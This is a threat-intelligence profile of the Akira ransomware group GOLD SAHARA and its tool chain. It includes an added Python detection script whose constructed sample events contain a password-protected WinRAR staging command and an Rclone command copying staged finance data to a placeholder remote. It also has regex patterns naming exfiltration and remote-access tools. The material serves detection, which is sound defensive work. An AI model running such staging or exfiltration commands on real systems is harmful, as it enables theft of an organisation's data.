GOLD SAHARA
SUMMARY
GOLD SAHARA is a cybercrime group that deploys Akira ransomware. The first Akira victim was named on a dedicated leak site in April 2023. There is no evidence that Akira is operated as ransomware-as-a-service (RaaS), but the rate of naming victims on the Akira leak site, at around 30 a month, suggests a large group of individuals is responsible for ransomware deployment.
GOLD SAHARA exclusively uses off-the-shelf tools and built-in utilities to conduct its operations. After compromising VPN accounts for initial access, the group uses Advanced IP Scanner and the SoftPerfect Network Scanner for network discovery, and the built-in Nltest Windows utility to identify domain trusts and domain controllers. It uses AnyDesk and PuTTY for remote access, and the WinRAR archiving tool to stage data for exfiltration using Rclone. The group has also been observed accessing and downloading SharePoint files to use in extortion attempts. Prior to deploying ransomware, GOLD SAHARA deletes administrator accounts, likely to hinder recovery efforts.
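The tool chain above (Nltest trust enumeration, network scanners, AnyDesk, WinRAR staging, Rclone, account deletion) is largely made of legitimate utilities, so detection rests on seeing several of them together on one host in a short window. The following script is an added example, not code from the profile or from any vendor: it runs a small set of regexes derived from the profile text over constructed Windows process-creation (Sysmon Event ID 1 / Security 4688) and account-deletion (Security 4726) records and reports hosts where several stages of the described chain co-occur. The event records, hostnames, paths and thresholds are all constructed for the example.

```python
"""
Added example (not from the original profile): triage constructed Windows
process-creation and account-management events for the tool pattern the
profile attributes to GOLD SAHARA. Field names loosely mirror Sysmon
Event ID 1 / Security 4688 (cmdline) and Security 4726 (target_user);
every record in SAMPLE_EVENTS is constructed for this example.
"""
import re
from collections import defaultdict

# One regex per stage named in the profile, matched against the
# lowercased command line of a process-creation event.
TECHNIQUES = {
    # nltest used for trust / domain-controller enumeration
    "domain_trust_discovery": re.compile(r"\bnltest(\.exe)?\b.*(/domain_trusts|/dclist)"),
    # Advanced IP Scanner or SoftPerfect Network Scanner (netscan.exe)
    "network_scan": re.compile(r"(advanced_ip_scanner|advanced ip scanner|\bnetscan(\.exe)?\b|softperfect)"),
    # Remote access tooling named in the profile
    "remote_access_tool": re.compile(r"\b(anydesk|putty)(\.exe)?\b"),
    # WinRAR / rar.exe invoked with the 'a' (add to archive) command
    "archive_staging": re.compile(r"\b(winrar|rar)(\.exe)?\b\"?\s+a\b"),
    # Rclone moving data out (copy / sync / move subcommands)
    "exfil_rclone": re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b"),
}


def classify_process(cmdline):
    """Return the technique labels whose pattern matches this command line."""
    lowered = cmdline.lower()
    return [name for name, rx in TECHNIQUES.items() if rx.search(lowered)]


def triage(events):
    """
    Group evidence per host.
    events: dicts with 'host', 'event_id', and either 'cmdline' (1/4688)
    or 'target_user' (4726). Returns {host: {label: [evidence, ...]}}.
    Hosts with no matching evidence are left out entirely.
    """
    findings = defaultdict(lambda: defaultdict(list))
    for ev in events:
        host = ev["host"]
        if ev["event_id"] in (1, 4688):  # process creation
            for label in classify_process(ev["cmdline"]):
                findings[host][label].append(ev["cmdline"])
        elif ev["event_id"] == 4726:  # a user account was deleted
            findings[host]["admin_account_deletion"].append(ev["target_user"])
    return {host: dict(labels) for host, labels in findings.items()}


def hosts_with_chain(findings, minimum=3):
    """Hosts on which at least `minimum` distinct stages were observed."""
    return sorted(h for h, labels in findings.items() if len(labels) >= minimum)


# Constructed sample telemetry: one host showing the full chain and one
# host with look-alike but benign activity that should not be flagged.
SAMPLE_EVENTS = [
    {"host": "WS-FINANCE-07", "event_id": 1,
     "cmdline": "nltest /domain_trusts /all_trusts"},
    {"host": "WS-FINANCE-07", "event_id": 1,
     "cmdline": r'"C:\Program Files\Advanced IP Scanner\advanced_ip_scanner.exe" /portable'},
    {"host": "WS-FINANCE-07", "event_id": 4688,
     "cmdline": r"C:\Users\svc_vpn\Downloads\AnyDesk.exe --install"},
    {"host": "WS-FINANCE-07", "event_id": 1,
     "cmdline": r'"C:\Program Files\WinRAR\Rar.exe" a -r -hp D:\stage\fin.rar \\fs01\finance'},
    {"host": "WS-FINANCE-07", "event_id": 1,
     "cmdline": r"rclone.exe copy D:\stage remote:bucket --transfers 8"},
    {"host": "WS-FINANCE-07", "event_id": 4726, "target_user": "backup_admin"},
    # Benign host: a plain nltest query and an rclone version check only.
    {"host": "WS-HR-02", "event_id": 1, "cmdline": "nltest /server:dc01 /query"},
    {"host": "WS-HR-02", "event_id": 1, "cmdline": "rclone version"},
    {"host": "WS-HR-02", "event_id": 1, "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for host in hosts_with_chain(result):
        print(host)
        for label, evidence in result[host].items():
            print(f"  {label}: {evidence[0]}")
```

The threshold in `hosts_with_chain` is deliberately a count of distinct stages rather than a single indicator, because every tool in the list has legitimate administrative uses; a lone `nltest` or `rclone` invocation is noise, while trust enumeration, a scanner, a remote-access tool, archiving and account deletion on the same host inside one incident window is the pattern the profile describes. In production the same logic would be fed from an EDR or SIEM query rather than an inline list, and the 4726 check would normally be restricted to members of administrative groups.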
Akira ransomware is written in C++ and has both Windows and Linux variants. It is based on the Conti ransomware source code and has a number of command line options that dictate encryption processes. Following Avast's release of a decryptor for Akira at the end of June 2023, Akira's developers made changes to the ransomware to strengthen its encryption routine.